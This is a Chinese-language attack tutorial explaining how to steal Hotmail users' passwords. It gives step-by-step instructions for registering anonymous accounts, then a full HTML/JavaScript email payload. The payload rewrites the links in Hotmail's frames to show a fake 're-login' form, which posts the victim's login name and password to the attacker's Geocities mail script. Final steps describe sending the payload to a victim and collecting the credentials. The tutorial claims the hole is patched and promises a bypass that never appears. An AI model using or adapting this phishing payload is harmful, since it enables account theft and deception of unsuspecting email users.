Hotmail安全漏洞攻击实例

　下面通过一个例子来说明如何使用最少的资源从Hotmail用户骗取口令。这个安全
漏洞已经被Hotmail于8月25日修复。但后面还介绍了一种如何绕过此fix而达到同样目的的方法。

　资源需求：
* 一台可以访问Internet的计算机
* Netscape Mail或同等的email程序
* Notepad程序或同等的文本编辑器

步骤一：
访问hotmail.com并申请一个免费电子邮件帐号，在注册过程中中必输入有效的联
系资料。;-)

步骤二：
访问Geocities.com并申请免费主页。在此我们选择ybwc用户名，在注册过程中同
样不必输入有效的联系资料，;-) 电子邮件地址除外。电子邮件地址为步骤一中所得到
的电子邮件地址。注册后，我们就在Geocities得到了一个免费电子邮件帐号
（ybwc@geocities.com）

步骤三：
打开Notepad，输入以下文本，并保存为message.htm。注意第17行包含了我们的
Geocities帐号(ybwc)。

$#@60;html$#@62;$#@60;head$#@62;$#@60;/head$#@62;$#@60;body$#@62;
$#@60;p$#@62;"Go where you want today" - Blue Adept$#@60;/p$#@62;
$#@60;script$#@62;
function getmess(){
return "$#@60;table border=0 cellpadding=5 cellspacing=5 width=508
height=90%$#@62;" +
"$#@60;tr valign=middle$#@62;" +
"$#@60;th colspan=2$#@62;" +
"$#@60;font face=\"Arial, Helvetica\" size=\"5\"$#@62;" +
"Were Sorry, We Cannot$#@60;br$#@62;Process Your Request" +
"$#@60;/font$#@62;$#@60;/th$#@62;$#@60;/tr$#@62;" +
"$#@60;tr valign=middle$#@62;$#@60;td align=center$#@62;" +
"$#@60;font face=\"Arial, Helvetica\" size=\"3\"$#@62;Reason: $#@60;/font$#@62;" +
"$#@60;font face=\"Arial, Helvetica\" size=\"3\"
color=\"#ff0000\"$#@62;$#@60;b$#@62;Time expired. Please re-login.$#@60;/b$#@62;$#@60;/font$#@62;$#@60;br$#@62;"
+
"$#@60;font face=\"Arial, Helvetica\" size=\"2\"$#@62;$#@60;a
href=\"http://www.hotmail.com/errormsg.html\"$#@62;(Get more info
regarding error messages here)$#@60;/a$#@62;$#@60;/font$#@62;" +
"$#@60;/td$#@62;$#@60;/tr$#@62;" +
"$#@60;tr valign=\"middle\"$#@62;$#@60;td align=\"center\"$#@62;" +
"$#@60;FORM METH POST
ACTION=\"http://www.geocities.com/cgi-bin/homestead/mail.pl?ybwc\"
target=\"_top\"$#@62;" +
"$#@60;INPUT TYPE=\"hidden\" NAME=\"next-url\"
VALUE=\"http://www.hotmail.com\"$#@62;" +
"$#@60;INPUT TYPE=\"hidden\" NAME=\"subject\" VALUE=\"Hotmail
Password\"$#@62;" +
"$#@60;table cellpadding=\"0\" cellspacing=\"5\" border=\"0\"$#@62;" +
"$#@60;tr$#@62;$#@60;td$#@62;$#@60;font face=\"Arial, Helvetica\" size=\"2\"$#@62;Login
Name:$#@60;/font$#@62;$#@60;br$#@62;$#@60;input type=\"text\" name=\"login\" size=\"16\"
maxlength=\"16\"$#@62;$#@60;/td$#@62;$#@60;td$#@62;$#@60;font face=\"Arial, Helvetica\"
size=\"2\"$#@62;Password:$#@60;/font$#@62;$#@60;br$#@62;$#@60;input type=\"password\"
name=\"passwd\" size=\"16\" maxlength=\"16\"$#@62; $#@60;input
type=\"submit\" value=\"Enter\"$#@62;$#@60;/td$#@62;$#@60;tr$#@62;" +
"$#@60;/table$#@62;$#@60;/form$#@62;$#@60;/td$#@62;$#@60;/tr$#@62;" +
"$#@60;tr valign=middle$#@62;$#@60;th colspan=2 align=center$#@62;" +
"$#@60;font face=\"Arial, Helvetica\" size=\"3\"$#@62;" +
"Return to $#@60;a href=\"http://welcome.to/www.hotmail.com\"
target=\"_parent\"$#@62;Hotmails Homepage$#@60;/a$#@62;." +
"$#@60;/font$#@62;$#@60;/th$#@62;$#@60;/tr$#@62;$#@60;/table$#@62;" +
"$#@60;p$#@62;$#@60;img src=\"http://209.1.112.251/c9698.gif\" width=189 height=16
border=0 alt=\"Copyright 1996-1997\"$#@62;";
}

nomenulinks=top.submenu.document.links.length;
for(i=0;i$#@60;nomenulinks-1;i++){
top.submenu.document.links[i].target="work";
top.submenu.document.links[i].href="javascript:getmess()";
}

noworklinks=top.work.document.links.length;
for(i=0;i$#@60;noworklinks-1;i++){
top.work.document.links[i].target="work";
top.work.document.links[i].href="javascript:getmess()";
}

$#@60;/script$#@62;
$#@60;/body$#@62;
$#@60;/html$#@62;

步骤四：
将message.htm插入到电子邮件中，并将其发送给攻击目标用户如victim@hotmail.com

步骤五：
在攻击目标用户检查过他的Hotmail帐号和邮件后，打开Geocities邮箱检查邮件。
就会得到含有victim@hotmail.com的ip地址、帐号和口令的电子邮件。